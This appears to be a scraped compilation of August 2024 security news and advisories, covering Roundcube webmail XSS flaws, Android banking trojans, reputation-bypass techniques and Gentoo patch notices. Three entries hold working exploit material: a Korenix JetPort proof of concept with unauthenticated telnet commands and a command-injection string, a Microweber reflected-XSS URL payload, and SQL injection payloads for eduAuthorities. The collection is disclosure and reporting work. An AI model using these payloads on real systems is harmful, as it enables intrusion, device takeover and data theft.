Cybersecurity researchers have disclosed details of security flaws in the Roundcube webmail software that could be exploited to execute malicious JavaScript in a victim's web browser and steal sensitive information from their account under specific circumstances.
"When a victim views a malicious email in Roundcube sent by an attacker, the attacker can execute arbitrary JavaScript in the victim's

Email Security / Vulnerability

Cybersecurity researchers have disclosed details of security flaws in the Roundcube webmail software that could be exploited to execute malicious JavaScript in a victim's web browser and steal sensitive information from their account under specific circumstances.

"When a victim views a malicious email in Roundcube sent by an attacker, the attacker can execute arbitrary JavaScript in the victim's browser," cybersecurity company Sonar said in an analysis published this week.

"Attackers can abuse the vulnerability to steal emails, contacts, and the victim's email password as well as send emails from the victim's account."

Following responsible disclosure on June 18, 2024, the three vulnerabilities have been addressed in Roundcube versions 1.6.8 and 1.5.8 released on August 4, 2024.

The list of vulnerabilities is as follows -

*   **CVE-2024-42008** - A cross-site scripting flaw via a malicious email attachment served with a dangerous Content-Type header
*   **CVE-2024-42009** - A cross-site scripting flaw that arises from post-processing of sanitized HTML content
*   **CVE-2024-42010** - An information disclosure flaw that stems from insufficient CSS filtering

Successful exploitation of the aforementioned flaws could allow unauthenticated attackers to steal emails and contacts, as well as send emails from a victim's account, but after viewing a specially crafted email in Roundcube.

"Attackers can gain a persistent foothold in the victim's browser across restarts, allowing them to exfiltrate emails continuously or steal the victim's password the next time it is entered," security researcher Oskar Zeino-Mahmalat said.

"For a successful attack, no user interaction beyond viewing the attacker's email is required to exploit the critical XSS vulnerability (CVE-2024-42009). For CVE-2024-42008, a single click by the victim is needed for the exploit to work, but the attacker can make this interaction unobvious for the user."

Additional technical details about the issues have been withheld to give time for users to update to the latest version, and in light of the fact that flaws in the webmail software have been repeatedly exploited by nation-state actors like APT28, Winter Vivern, and TAG-70.

The findings come as details have emerged about a maximum-severity local privilege escalation flaw in the RaspAP open-source project (CVE-2024-41637, CVSS score: 10.0) that allows an attacker to elevate to root and execute several critical commands. The vulnerability has been addressed in version 3.1.5.

"The www-data user has write access to the restapi.service file and also possesses sudo privileges to execute several critical commands without a password," a security researcher who goes by the online alias 0xZon1 said. "This combination of permissions allows an attacker to modify the service to execute arbitrary code with root privileges, escalating their access from www-data to root."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Roundcube Webmail Flaws Allow Hackers to Steal Emails and Passwords

Cybersecurity researchers have lifted the lid on a new technique adopted by threat actors behind the Chameleon Android banking trojan targeting users in Canada by masquerading as a Customer Relationship Management (CRM) app.
"Chameleon was seen masquerading as a CRM app, targeting a Canadian restaurant chain operating internationally," Dutch security outfit ThreatFabric said in a technical

Android / Mobile Security,

Cybersecurity researchers have lifted the lid on a new technique adopted by threat actors behind the Chameleon Android banking trojan targeting users in Canada by masquerading as a Customer Relationship Management (CRM) app.

"Chameleon was seen masquerading as a CRM app, targeting a Canadian restaurant chain operating internationally," Dutch security outfit ThreatFabric said in a technical report published Monday.

The campaign, spotted in July 2024, targeted customers in Canada and Europe, indicating an expansion of its victimology footprint from Australia, Italy, Poland, and the U.K.

The use of CRM-related themes for the malicious dropper apps containing the malware points to the targets being customers in the hospitality sector and Business-to-Consumer (B2C) employees.

The dropper artifacts are also designed to bypass Restricted Settings imposed by Google in Android 13 and later in order to prevent sideloaded apps from requesting for dangerous permissions (e.g., accessibility services), a technique previously employed by SecuriDroper and Brokewell.

Once installed, the app displays a fake login page for a CRM tool and then displays a bogus error message urging the victims to reinstall the app, when, in reality, it deploys the Chameleon payload.

This step is followed by loading the phony CRM web page again, this time asking them to complete the login process, only to display a different error message stating "Your account is not activated yet. Contact the HR department."

Chameleon is equipped to conduct on-device fraud (ODF) and fraudulently transfer users' funds, while also leveraging overlays and its wide-ranging permissions to harvest credentials, contact lists, SMS messages, and geolocation information.

"If the attackers succeed in infecting a device with access to corporate banking, Chameleon gets access to business banking accounts and poses a significant risk to the organization," ThreatFabric said. "The increased likelihood of such access for employees whose roles involve CRM is the likely reason behind the choice of the masquerading during this latest campaign."

The development comes weeks after IBM X-Force detailed a Latin American banking malware campaign undertaken by the CyberCartel group to steal credentials and financial data as well as deliver a trojan named Caiman by means of malicious Google Chrome extensions.

"The ultimate objective of these malicious activities is to install a harmful browser plugin on the victim's browser and use the Man-in-the-Browser technique," the company said.

"This allows the attackers to illegally collect sensitive banking information, along with other relevant data such as compromised machine information and on-demand screenshots. Updates and configurations are disseminated via a Telegram channel by the threat actors."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chameleon Android Banking Trojan Targets Users Through Fake CRM App

While still under development, the malware contains Turkish-language filenames, can record the screen and keystrokes, and inject custom overlays to steal passwords and sensitive data.

Source: Muhammad Toqeer via Shutterstock

A threat intelligence firm discovered samples of a malicious Android program that appears to target Turkish-language speakers. The program can take screen grabs, capture keystrokes, and create custom overlays — also known as Web injections — that can fool users into entering sensitive information.

The Trojan, dubbed BlankBot, appears to be under active development — judging from a significant number of code variants and log files — and remains largely undetected by the anti-malware scanners hosted on VirusTotal, cyberthreat-intelligence firm Intel 471 stated in its report published on Aug. 1. The developers of the Trojan use openly available libraries for mimicking account pages and producing other overlays and showed other signs of cybercriminal sophistication, Intel 471's analysts, who asked not to be named, said in an email interview.

"The developers appear to be experienced Android application developers, and they also demonstrate an understanding of the ATO \[account takeover\] business," they said. "These libraries allow the malware operators to imitate real financial applications more closely and create a seamless, authentic-looking phishing page, making it more likely that a user will follow all the steps and give up their sensitive information."

At this point, the motive for the group's targeting of Turkey is unclear, the company said. In recent years, Turkey has become a target for cyberattackers, especially nation-state espionage groups. India's SideWinder group has targeted individuals in Turkey — in addition to the group's typical targets of regional rivals, such as Pakistan — while China's APT41 has targeted global shipping, technology, and automotive industries, including those in Turkey.

Meanwhile, the country has been developing its own cyber capabilities. A Turkey-linked group has targeted Kurdish opposition groups throughout Europe, the Middle East, and North Africa, while another cybercriminal group in Turkey is targeting corporate databases in the United States, Europe, and Latin America with ransomware.

**Malware Under Development**

The malicious application appears to be under development but already has a host of features. Like other Android malware, BlankBot requests permission and then uses Android's accessibility features to take control of the device. Once in control, the malware can record the screen via the MediaProjection API, with the recording saved as JPEG images, which are then sent to a remote server.

In a relatively rare technique, the malware also creates its own keyboard for input, so the application can more easily capture user keystroke input. BlankBot also uses two open source libraries, CompactCreditInput and Pattern Locker View, to create screens that mimic the data entry pages for various sensitive credentials, such as usernames, passwords, PIN combinations, and credit card information, Intel 471 stated in its advisory.

Finally, using the accessibility services, the company said that the malware can control certain features by spoofing finger swipes.

"Threat actors are able to perform on-device fraud (ODF) by waking up and controlling the device remotely with different types of supported gestures, such as clicks or swipes," the advisory stated. "Additionally, BlankBot is capable of creating overlays, as described in the previous section, as well as collecting contacts, SMS text and a list of installed applications."

**Focused on Cybercrime**

The malware's lineage is still a question mark. While Turkey-linked groups have not shied away from sophisticated attacks against the country's rivals, Intel 471's analysts say the malware seems more likely targeted at financial gain through cybercrime.

"We're fairly certain that this malware was not written for espionage because it has all of the features required for account takeover for financial gain, such as overlays for popular financial applications," the analysts said in an email interview. "Some of those features have limited use for espionage purposes but would make the malware more likely to be detected by anti-malware products."

However, the malware has anti-analysis capabilities, such as obfuscated code and a feature for detecting if it runs in an emulator.

Finally, while Turkish language strings do appear in the code, the malware could easily be localized to target other users and mimic other institutions, Intel 471 stated in its advisory.

"\[N\]o specific financial institutions were identified as targets during our analysis, therefore, this malware could be distributed in campaigns against users in different countries," the advisory stated.

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

BlankBot Trojan Targets Turkish Android Users

Protections like Windows Smart App Control are useful but susceptible to attacks that allow threat actors initial access to an environment without triggering any alerts.

Source: ozrimoz via Shutterstock

Reputation-based security controls may be less effective at protecting organizations against unsafe Web applications and content than many assume.

A new study by researchers at Elastic Security found attackers have developed several effective techniques over the past few years to bypass mechanisms that block or allow applications and content based on their reputation and trustworthiness.

**Multiple Available Techniques**

The techniques include using digitally signed malware tools to make them appear legit, as well as reputation hijacking, reputation tampering, and specially crafted LNK files. "Reputation-based protection systems are a powerful layer for blocking commodity malware," Elastic Security researcher Joe Desimone wrote in a report this week. "However, like any protection technique, they have weaknesses that can be bypassed with some care."

For the study, the researchers used Microsoft Windows Smart App Control (SAC) and SmartScreen technologies as examples of a reputation-based mechanism for which attackers have developed bypasses.

SmartScreen is a feature that Microsoft introduced with Windows 8 to protect users against malicious website applications and file downloads. It verifies whether files that have the Mark of the Web (MoTW) on them — or files that Windows tags as downloaded from the Internet — can be trusted. Smart App Control became available with Windows 11. It uses Microsoft's threat intelligence service to determine if an application is trustworthy enough to run or not. If the threat intelligence is unable to determine an app's trustworthiness, SAC verifies if the app is digitally signed before allowing it to run.

The researchers at Elastic Security discovered that attackers have multiple ways around these protections.

**LNK Stomping Around MoTW**

One common way that attackers have used as a way around Smart App Control is by signing their malware with an extended validation (EV) SSL certificate, Elastic Security said. Though certificate authorities require proof of identity before they issue an EV to a requesting entity, threat actors have found ways to address this requirement by impersonating legitimate businesses. In other instances, they have used specially crafted and invalid code signing signatures to JavaScript and MSI files to bypass MoTW checks. For the past six years at least, attackers have also abused a weakness in how Windows handles shortcut files (LNK) to essentially strip the MoTW from malicious LNK files and sneak them past SmartScreen said Elastic Security, which has dubbed the tactic "LNK Stomping."

Reputation hijacking — where an attacker exploits the good reputation of trusted applications, websites and other entities — is another tactic. Elastic Security found that attackers often target trusted script hosts — or programs that execute scripts — such as Lua, Node.js, and AutoHotkey for this type of attack. The bypass involves placing malicious content where the trusted script host will automatically find and execute it during its normal course. "Script hosts are an ideal target for a reputation hijacking attack. This is especially true if they include a foreign function interface (FFI) capability," Desimone wrote. "With FFI, attackers can easily load and execute arbitrary code and malware in memory."

Elastic Security also found attackers using a technique called reputation seeding to bypass reputation-based filtering mechanisms. For these attacks, threat actors first introduce their own seemingly benign binaries or executable files into a target system and wait for them to build up a positive reputation over time. Another variation is introducing a legit application with a known vulnerability to a target environment for later use. "Smart App Control appears vulnerable to seeding," Desimone said in his report. "After executing a sample on one machine, it received a good label after approximately 2 hours."

The security vendor recommends that organizations bolster their security by using behavior analysis tools to monitor for common attack tactics such as credential access, enumeration, in-memory evasion, persistence, and lateral movement.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Attackers Use Multiple Techniques to Bypass Reputation-Based Security

A Reflected Cross-site scripting (XSS) vulnerability exists in '/search' in microweber 2.0.15 and earlier allowing unauthenticated remote attackers to inject arbitrary web script or HTML via the 'keywords' parameter.

**Microweber Reflected Cross-site scripting (XSS) vulnerability**

Moderate severity GitHub Reviewed Published Aug 6, 2024 to the GitHub Advisory Database • Updated Aug 6, 2024

GHSA-m99v-mmg2-66vf: Microweber Reflected Cross-site scripting (XSS) vulnerability

Korenix JetPort Series version 1.2 suffers from insufficient authentication, command injection, and plaintext communication vulnerabilities.

CyberDanube Security Research 20240805-0  
-------------------------------------------------------------------------------  
                title| Multiple Vulnerabilities in JetPort Series  
              product| Korenix JetPort Series  
   vulnerable version| 1.2  
        fixed version| None  
           CVE number| CVE-2024-7395, CVE-2024-7396, CVE-2024-7397  
               impact| High  
             homepage| https://www.korenix.com/  
                found| 2024-04-01  
                   by| S. Dietz (Office Vienna)  
                     | CyberDanube Security Research  
                     | Vienna | St. Pölten  
                     |  
                     | https://www.cyberdanube.com  
-------------------------------------------------------------------------------

Vendor description  
-------------------------------------------------------------------------------  
"Korenix Technology, a Beijer group company within the Industrial Communication  
business area, is a global leading manufacturer providing innovative, market-  
oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
With decades of experiences in the industry, we have developed various product  
lines [...].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-  
Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer  
base covers different Sales channels, including end-customers, OEMs, system  
integrators, and brand label partners. [...]"

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions  
-------------------------------------------------------------------------------  
Korenix JetPort 5601v3 / v1.2

Vulnerability overview  
-------------------------------------------------------------------------------  
1) Insufficient Authentication (CVE-2024-7395)  
The configuration service on port 600/tcp doesnt require authentication to be  
used. This allows an attacker to change the password or other critical  
information.

2) Plaintext Communication (CVE-2024-7396)  
The communication of the configuration service is transmitted in plain text.  
An attacker could use this information to sniff passwords or other critical  
information.

3) Unauthenticated Command Injection (CVE-2024-7397)  
An attacker with network access an can execute arbitrary commands as root user  
via the management service on port 600/tcp.

Proof of Concept  
-------------------------------------------------------------------------------  
1) Insufficient Authentication (CVE-2024-7395)  
The management software JetPort Commander is used as an frontend for the telnet  
service on 600/tcp. While it is possible to set a password, the passwords gets  
sent to the software in cleartext and gets validated on the client software  
rather than on the device. An attacker can bypass the management software by  
using telnet to directly connect to the port. This allows him to reconfigure  
the device including passwords and access controls.

$ telnet 192.168.122.76 600  
Trying 192.168.122.76...  
Connected to 192.168.122.76.  
Escape character is '^]'.  
-> setpassword poc

target:/$ cat /tmp/com2ip.conf  
version:1.2.0  
model:JetPort5601v3  
name:JetPort5601v3-DEFAULT  
serialno:0000000000000000  
password:poc  
switchmode:redundant  
network:static:192.168.122.76:192.168.10.1:192.168.10.1

2) Plaintext Communication (CVE-2024-7396)  
The management service uses telnet as protocol. We used tcpdump to inspect the  
traffic during a password change. The new password (newpass) is readable during  
transmission.

# sudo tcpdump -i virbr0 dst port 600 -X  
14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21  
      0x0000:  4500 003d 16a7 4000 8006 6d86 c0a8 7af0  E..=..@...m...z.  
      0x0010:  c0a8 7a4c c1c0 0258 522b 6096 12eb 337d  ..zL...XR+`...3}  
      0x0020:  5018 4026 76bd 0000 7365 7470 6173 7377  P.@&v...setpassw  
      0x0030:  6f72 6420 6e65 7770 6173 730d 0a         ord.newpass..

3) Unauthenticated Remote Code Execution (CVE-2024-7397)  
The management service on port 600/tcp is used to configure JetPort devices  
over the network. An attacker can inject arbitrary commands in multiple  
settings options. The binary ser2net receives the data via the telnet  
protocol and translates it to arguments for system() calls. For our PoC we  
used the setsntp option to create the file /tmp/pwned.

$ telnet 192.168.122.76 600  
Trying 192.168.122.76...  
Connected to 192.168.122.76.  
Escape character is '^]'.  
-> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1  
OK  
->

target:/$ ls -rtlha /tmp/  
drwxrwxr-x   17 root     0            1.0k Apr  4 10:41 ..  
-rw-r--r--    1 root     0               4 Apr  4 12:28 thttpd.pid  
-rw-r--r--    1 root     0             712 Apr  4 12:29 com2ip.conf  
-rw-r--r--    1 root     0               0 Apr  4 12:33 pwned  
-------------------------------------------------------------------------------

The vulnerabilities were manually verified on an emulated device by using the  
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution  
-------------------------------------------------------------------------------  
None. Device is End-of-Life.

Workaround  
-------------------------------------------------------------------------------  
Limit the access to the device and place it within a segmented network.

Recommendation  
-------------------------------------------------------------------------------  
CyberDanube recommends customers from Korenix to remove the device from their  
network topology.

Contact Timeline  
-------------------------------------------------------------------------------  
2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com.  
2024-05-07: Received confirmation that the issue is beeing looked into.  
2024-06-10: Contact stated that the product is considered EoL and will no  
            longer receive security updates.  
2024-06-10: Confirm receipt and telling them that we will publish the  
            advisory after our 90-days deadline.  
2024-08-05: Publication of the Advisory.

Web: https://www.cyberdanube.com  
Twitter: https://twitter.com/cyberdanube  
Mail: research at cyberdanube dot com

EOF Sebastian Dietz / @2024

Korenix JetPort Series 1.2 Command Injection / Insufficient Authentication

Microweber version 1.0 suffers from a cross site scripting vulnerability in the search functionality. Original discovery of cross site scripting in this version is attributed to tmrswrr in June of 2024.

    # Exploit Title: Microweber <=v2.0.15 - Reflected Cross-Site Scripting (XSS)# Date: 16.07.2024# Exploit Author: Prerak Mittal# Vendor Homepage: https://microweber.org/# Software Link: https://github.com/microweber/microweber/releases/tag/v2.0.15# Version: <=v2.0.15# Tested on: Ubuntu 22.04# CVE : CVE-2024-40101# Description:## App Installation:1. Clone the repository and build the application using docker:```git clone -b v2.0.15 https://github.com/microweber/microweber.gitcd microweberdocker compose up -d```2. Visit http://localhost3. Follow along the UI installation process.## Steps to reproduce:1. Visit http://localhost/search2. Insert the below payload in `keywords` parameter:  "onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"  Complete Exploit URL: http://localhost/search?keywords=%22onscrollend=alert(1)%20style=%22display:block;overflow:auto;border:1px%20dashed;width:500px;height:100px;%22  3. Scroll any of the two `div` sections created on the search results page. Once the scroll finishes, it will trigger the alert popup.

Microweber 2.0.15 Cross Site Scripting

Gentoo Linux Security Advisory 202408-2 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could lead to remote code execution. Versions greater than or equal to 115.12.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: August 06, 2024  
     Bugs: #930380, #932374, #935550  
       ID: 202408-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could lead to remote code execution.

Background  
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
=================

Package                 Vulnerable      Unaffected  
----------------------  --------------  ---------------  
www-client/firefox      < 115.12.0:esr  >= 115.12.0:esr  
                        < 127.0:rapid   >= 127.0:rapid  
www-client/firefox-bin  < 115.12.0:esr  >= 115.12.0:esr  
                        < 127.0:rapid   >= 127.0:rapid

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-127.0:rapid"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-127.0:rapid"

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-115.12.0:esr"

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-115.12.0:esr"

References  
==========

[ 1 ] CVE-2024-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2609  
[ 2 ] CVE-2024-3302  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3302  
[ 3 ] CVE-2024-3853  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3853  
[ 4 ] CVE-2024-3854  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3854  
[ 5 ] CVE-2024-3855  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3855  
[ 6 ] CVE-2024-3856  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3856  
[ 7 ] CVE-2024-3857  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3857  
[ 8 ] CVE-2024-3858  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3858  
[ 9 ] CVE-2024-3859  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3859  
[ 10 ] CVE-2024-3860  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3860  
[ 11 ] CVE-2024-3861  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3861  
[ 12 ] CVE-2024-3862  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3862  
[ 13 ] CVE-2024-3864  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3864  
[ 14 ] CVE-2024-3865  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3865  
[ 15 ] CVE-2024-4764  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4764  
[ 16 ] CVE-2024-4765  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4765  
[ 17 ] CVE-2024-4766  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4766  
[ 18 ] CVE-2024-4771  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4771  
[ 19 ] CVE-2024-4772  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4772  
[ 20 ] CVE-2024-4773  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4773  
[ 21 ] CVE-2024-4774  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4774  
[ 22 ] CVE-2024-4775  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4775  
[ 23 ] CVE-2024-4776  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4776  
[ 24 ] CVE-2024-4778  
      https://nvd.nist.gov/vuln/detail/CVE-2024-4778  
[ 25 ] CVE-2024-5689  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5689  
[ 26 ] CVE-2024-5693  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5693  
[ 27 ] CVE-2024-5694  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5694  
[ 28 ] CVE-2024-5695  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5695  
[ 29 ] CVE-2024-5696  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5696  
[ 30 ] CVE-2024-5697  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5697  
[ 31 ] CVE-2024-5698  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5698  
[ 32 ] CVE-2024-5699  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5699  
[ 33 ] CVE-2024-5700  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5700  
[ 34 ] CVE-2024-5701  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5701  
[ 35 ] CVE-2024-5702  
      https://nvd.nist.gov/vuln/detail/CVE-2024-5702  
[ 36 ] MFSA-2024-25  
[ 37 ] MFSA-2024-26  
[ 38 ] MFSA-2024-28

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-02

eduAuthorities version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: eduAuthorities-1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 07/29/2024## Vendor: https://www.mayurik.com/## Software:https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The editid parameter appears to be vulnerable to SQL injection attacks. Thepayloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were eachsubmitted in the editid parameter. These two requests resulted in differentresponses, indicating that the input is being incorporated into a SQL queryin an unsafe way. Note that automated difference-based tests for SQLinjection flaws can often be unreliable and are prone to false positiveresults. You should manually review the reported requests and responses toconfirm whether a vulnerability is actually present.Additionally, the payload (select*from(select(sleep(20)))a) was submittedin the editid parameter. The application took 20011 milliseconds to respondto the request, compared with 3 milliseconds for the original request,indicating that the injected SQL command caused a time delay.The attackercan get all information from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: #1* (URI)    Type: boolean-based blind    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#UiVZfrom(select(sleep(3)))a)    Type: UNION query    Title: MySQL UNION query (random number) - 3 columns    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962UNION ALL SELECT8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)---```## Reproduce:[href](https://www.patreon.com/posts/eduauthorities-1-109562178)## More:[href](https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)## Time spent:00:37:00

eduAuthorities 1.0 SQL Injection

Gentoo Linux Security Advisory 202408-1 - Multiple vulnerabilities have been discovered in containerd, the worst of which could lead to privilege escalation. Versions greater than or equal to 1.6.19 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: containerd: Multiple Vulnerabilities  
     Date: August 06, 2024  
     Bugs: #897960  
       ID: 202408-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in containerd, the worst  
of which could lead to privilege escalation.

Background  
==========

containerd is a daemon with an API and a command line client, to manage  
containers on one machine. It uses runC to run containers according to  
the OCI specification.

Affected packages  
=================

Package                    Vulnerable    Unaffected  
-------------------------  ------------  ------------  
app-containers/containerd  < 1.6.19      >= 1.6.19

Description  
===========

Multiple vulnerabilities have been discovered in containerd. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All containerd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-containers/containerd-1.6.19"

References  
==========

[ 1 ] CVE-2023-25153  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25153  
[ 2 ] CVE-2023-25173  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25173

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#web